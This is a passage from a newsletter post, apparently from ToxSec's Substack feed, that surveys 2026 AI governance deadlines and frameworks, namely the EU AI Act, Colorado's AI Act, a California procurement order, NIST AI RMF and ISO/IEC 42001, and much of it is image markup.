deadlines this year. Here&#8217;s what they demand and where programs quietly fail.]]></description><link>https://www.toxsec.com/p/ai-governance-requirements-2026</link><guid isPermaLink="false">https://www.toxsec.com/p/ai-governance-requirements-2026</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Thu, 09 Apr 2026 13:32:00 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!gQHr!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35cc3b7f-3992-4363-b13c-8ff565b6cb4b_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!gQHr!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35cc3b7f-3992-4363-b13c-8ff565b6cb4b_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!gQHr!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35cc3b7f-3992-4363-b13c-8ff565b6cb4b_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!gQHr!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35cc3b7f-3992-4363-b13c-8ff565b6cb4b_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!gQHr!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35cc3b7f-3992-4363-b13c-8ff565b6cb4b_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!gQHr!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35cc3b7f-3992-4363-b13c-8ff565b6cb4b_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!gQHr!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35cc3b7f-3992-4363-b13c-8ff565b6cb4b_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/35cc3b7f-3992-4363-b13c-8ff565b6cb4b_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:7810236,&quot;alt&quot;:&quot;AI governance framework 2026 compliance requirements EU AI Act NIST AI RMF enforcement deadlines enterprise security controls audit&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/192628488?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F94fbc3a4-ca8b-45ba-b3dd-a5b5b3024846_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="AI governance framework 2026 compliance requirements EU AI Act NIST AI RMF enforcement deadlines enterprise security controls audit" title="AI governance framework 2026 compliance requirements EU AI Act NIST AI RMF enforcement deadlines enterprise security controls audit" srcset="https://substackcdn.com/image/fetch/$s_!gQHr!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35cc3b7f-3992-4363-b13c-8ff565b6cb4b_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!gQHr!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35cc3b7f-3992-4363-b13c-8ff565b6cb4b_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!gQHr!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35cc3b7f-3992-4363-b13c-8ff565b6cb4b_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!gQHr!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35cc3b7f-3992-4363-b13c-8ff565b6cb4b_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> Three AI governance deadlines converge in 2026. The EU AI Act hits full enforcement August 2. Colorado&#8217;s AI Act takes effect June 30. California just signed a procurement executive order with teeth. Most enterprises have a policy document. Almost none have a working audit trail. Here&#8217;s what the frameworks actually require and exactly where programs break.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Why AI Governance Enforcement Hits Different in 2026</h2><p>The <a href="https://digital-strategy.ec.europa.eu/en/policies/regulatory-framework-ai">EU AI Act</a> reaches full enforcement August 2, 2026. High-risk AI systems, anything touching employment decisions, critical infrastructure, education, or essential services, must have conformity assessments complete, human oversight mechanisms operational, and technical documentation ready for inspection. Penalties scale to &#8364;35 million or 7% of global annual turnover. That applies to any organization selling into the EU market regardless of where HQ sits.</p><p>Colorado&#8217;s AI Act takes effect June 30, 2026, after a bruising special session in August 2025 that collapsed every attempt at substantive reform and ended with legislators just changing the date. The law remains intact. Impact assessments, disclosure requirements, and algorithmic discrimination protections all go live as written. The Attorney General has exclusive enforcement authority.</p><p>Then California dropped a new procurement executive order on <a href="https://www.ropesgray.com/en/insights/alerts/2026/04/newsom-signs-executive-order-establishing-ai-vendor-certification-and-procurement-framework">March 30, 2026</a>, requiring AI vendor certifications covering content safety, bias safeguards, and civil rights protections for any company selling to the state. California is the nation&#8217;s largest state market for AI products. That makes its procurement standards a de facto national benchmark.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!UsuE!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb15a3d6-5ce0-4639-a329-2aae2211ef21_843x1112.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!UsuE!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb15a3d6-5ce0-4639-a329-2aae2211ef21_843x1112.png 424w, https://substackcdn.com/image/fetch/$s_!UsuE!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb15a3d6-5ce0-4639-a329-2aae2211ef21_843x1112.png 848w, https://substackcdn.com/image/fetch/$s_!UsuE!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb15a3d6-5ce0-4639-a329-2aae2211ef21_843x1112.png 1272w, https://substackcdn.com/image/fetch/$s_!UsuE!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb15a3d6-5ce0-4639-a329-2aae2211ef21_843x1112.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!UsuE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb15a3d6-5ce0-4639-a329-2aae2211ef21_843x1112.png" width="620" height="817.841043890866" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/eb15a3d6-5ce0-4639-a329-2aae2211ef21_843x1112.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1112,&quot;width&quot;:843,&quot;resizeWidth&quot;:620,&quot;bytes&quot;:92162,&quot;alt&quot;:&quot;Enforcement Deadlines: Timeline: AI governance enforcement timeline showing four 2026 regulatory deadlines from California executive order through EU AI Act full enforcement, with countdown days and penalty descriptions.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/192628488?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb15a3d6-5ce0-4639-a329-2aae2211ef21_843x1112.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Enforcement Deadlines: Timeline: AI governance enforcement timeline showing four 2026 regulatory deadlines from California executive order through EU AI Act full enforcement, with countdown days and penalty descriptions." title="Enforcement Deadlines: Timeline: AI governance enforcement timeline showing four 2026 regulatory deadlines from California executive order through EU AI Act full enforcement, with countdown days and penalty descriptions." srcset="https://substackcdn.com/image/fetch/$s_!UsuE!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb15a3d6-5ce0-4639-a329-2aae2211ef21_843x1112.png 424w, https://substackcdn.com/image/fetch/$s_!UsuE!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb15a3d6-5ce0-4639-a329-2aae2211ef21_843x1112.png 848w, https://substackcdn.com/image/fetch/$s_!UsuE!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb15a3d6-5ce0-4639-a329-2aae2211ef21_843x1112.png 1272w, https://substackcdn.com/image/fetch/$s_!UsuE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb15a3d6-5ce0-4639-a329-2aae2211ef21_843x1112.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>On the federal side, <a href="https://www.credo.ai/blog/latest-ai-regulations-update-what-enterprises-need-to-know">US agencies issued 59 AI-related regulations in 2024 alone</a>, more than double the prior year. Congress still hasn&#8217;t passed a unified AI law, so the FTC, NIST, and the Department of Commerce keep filling the gap inside existing mandates. The White House released a &#8220;National Policy Framework for Artificial Intelligence&#8221; in March 2026 proposing state preemption, but that&#8217;s a recommendation to Congress, and Congress keeps stripping preemption provisions from bills.</p><p>Three overlapping regulatory clocks. Different definitions. Different jurisdictions. No unified federal baseline to rationalize any of it. For organizations already building <a href="https://www.toxsec.com/p/nobody-knows-what-to-call-this-job">AI security roles nobody can quite define yet</a>, these are the frameworks those roles are supposed to operationalize.</p><h2>What AI Governance Frameworks Actually Require</h2><p>Three frameworks dominate enterprise compliance programs right now.</p><p><strong>EU AI Act</strong> runs on risk classification. Unacceptable-risk systems are banned outright. High-risk systems require technical documentation proving how the model was built and validated, human oversight mechanisms that can intervene in production, and conformity assessments completed before deployment. The European Commission&#8217;s Digital Omnibus proposal could extend the high-risk deadline to December 2027. That&#8217;s a proposal in negotiation, and planning around a maybe will get you fined on the original timeline.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!6CtO!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92edd197-f7f4-42c0-9675-6ddad7910830_945x494.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!6CtO!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92edd197-f7f4-42c0-9675-6ddad7910830_945x494.png 424w, https://substackcdn.com/image/fetch/$s_!6CtO!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92edd197-f7f4-42c0-9675-6ddad7910830_945x494.png 848w, https://substackcdn.com/image/fetch/$s_!6CtO!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92edd197-f7f4-42c0-9675-6ddad7910830_945x494.png 1272w, https://substackcdn.com/image/fetch/$s_!6CtO!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92edd197-f7f4-42c0-9675-6ddad7910830_945x494.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!6CtO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92edd197-f7f4-42c0-9675-6ddad7910830_945x494.png" width="945" height="494" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/92edd197-f7f4-42c0-9675-6ddad7910830_945x494.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:494,&quot;width&quot;:945,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:43044,&quot;alt&quot;:&quot;Framework Requirements: Comparison: AI governance framework comparison of EU AI Act, NIST AI RMF, and ISO/IEC 42001 showing scope, core requirements, enforcement mechanisms, and penalties for each compliance standard.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/192628488?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92edd197-f7f4-42c0-9675-6ddad7910830_945x494.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Framework Requirements: Comparison: AI governance framework comparison of EU AI Act, NIST AI RMF, and ISO/IEC 42001 showing scope, core requirements, enforcement mechanisms, and penalties for each compliance standard." title="Framework Requirements: Comparison: AI governance framework comparison of EU AI Act, NIST AI RMF, and ISO/IEC 42001 showing scope, core requirements, enforcement mechanisms, and penalties for each compliance standard." srcset="https://substackcdn.com/image/fetch/$s_!6CtO!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92edd197-f7f4-42c0-9675-6ddad7910830_945x494.png 424w, https://substackcdn.com/image/fetch/$s_!6CtO!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92edd197-f7f4-42c0-9675-6ddad7910830_945x494.png 848w, https://substackcdn.com/image/fetch/$s_!6CtO!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92edd197-f7f4-42c0-9675-6ddad7910830_945x494.png 1272w, https://substackcdn.com/image/fetch/$s_!6CtO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92edd197-f7f4-42c0-9675-6ddad7910830_945x494.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>NIST AI RMF</strong> structures AI risk management across four functions: Govern, Map, Measure, and Manage. GOVERN is the chokepoint. It requires documented AI roles and ownership structures, explicit risk tolerance thresholds, and clear accountability lines for AI decisions. The 2024 Generative AI Profile extended coverage specifically to LLMs and agentic systems. NIST AI RMF carries no independent penalties, but federal contracts and procurement pipelines increasingly require demonstrated alignment with it. If you&#8217;re chasing government work, this is your compliance floor.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!BdLu!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb918146-4fd4-4085-a1d7-dcef044fd88f_947x491.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!BdLu!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb918146-4fd4-4085-a1d7-dcef044fd88f_947x491.png 424w, https://substackcdn.com/image/fetch/$s_!BdLu!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb918146-4fd4-4085-a1d7-dcef044fd88f_947x491.png 848w, https://substackcdn.com/image/fetch/$s_!BdLu!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb918146-4fd4-4085-a1d7-dcef044fd88f_947x491.png 1272w, https://substackcdn.com/image/fetch/$s_!BdLu!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb918146-4fd4-4085-a1d7-dcef044fd88f_947x491.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!BdLu!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb918146-4fd4-4085-a1d7-dcef044fd88f_947x491.png" width="947" height="491" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/eb918146-4fd4-4085-a1d7-dcef044fd88f_947x491.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:491,&quot;width&quot;:947,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:51219,&quot;alt&quot;:&quot;Framework Requirements: Comparison: AI governance framework comparison of EU AI Act, NIST AI RMF, and ISO/IEC 42001 showing scope, core requirements, enforcement mechanisms, and penalties for each compliance standard.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/192628488?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb918146-4fd4-4085-a1d7-dcef044fd88f_947x491.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Framework Requirements: Comparison: AI governance framework comparison of EU AI Act, NIST AI RMF, and ISO/IEC 42001 showing scope, core requirements, enforcement mechanisms, and penalties for each compliance standard." title="Framework Requirements: Comparison: AI governance framework comparison of EU AI Act, NIST AI RMF, and ISO/IEC 42001 showing scope, core requirements, enforcement mechanisms, and penalties for each compliance standard." srcset="https://substackcdn.com/image/fetch/$s_!BdLu!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb918146-4fd4-4085-a1d7-dcef044fd88f_947x491.png 424w, https://substackcdn.com/image/fetch/$s_!BdLu!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb918146-4fd4-4085-a1d7-dcef044fd88f_947x491.png 848w, https://substackcdn.com/image/fetch/$s_!BdLu!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb918146-4fd4-4085-a1d7-dcef044fd88f_947x491.png 1272w, https://substackcdn.com/image/fetch/$s_!BdLu!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb918146-4fd4-4085-a1d7-dcef044fd88f_947x491.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>ISO/IEC 42001</strong>, the first certifiable AI management standard, is showing up in vendor assessments alongside SOC 2 and ISO 27001. Enterprise procurement teams check for it now. That signal only gets louder. If you&#8217;ve already mapped your AI supply chain security posture, this is the governance layer that sits on top.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!5WA3!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a721aba-84fa-4d61-915b-7f0237e1c283_951x491.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!5WA3!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a721aba-84fa-4d61-915b-7f0237e1c283_951x491.png 424w, https://substackcdn.com/image/fetch/$s_!5WA3!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a721aba-84fa-4d61-915b-7f0237e1c283_951x491.png 848w, https://substackcdn.com/image/fetch/$s_!5WA3!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a721aba-84fa-4d61-915b-7f0237e1c283_951x491.png 1272w, https://substackcdn.com/image/fetch/$s_!5WA3!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a721aba-84fa-4d61-915b-7f0237e1c283_951x491.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!5WA3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a721aba-84fa-4d61-915b-7f0237e1c283_951x491.png" width="951" height="491" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7a721aba-84fa-4d61-915b-7f0237e1c283_951x491.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:491,&quot;width&quot;:951,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:51612,&quot;alt&quot;:&quot;Framework Requirements: Comparison: AI governance framework comparison of EU AI Act, NIST AI RMF, and ISO/IEC 42001 showing scope, core requirements, enforcement mechanisms, and penalties for each compliance 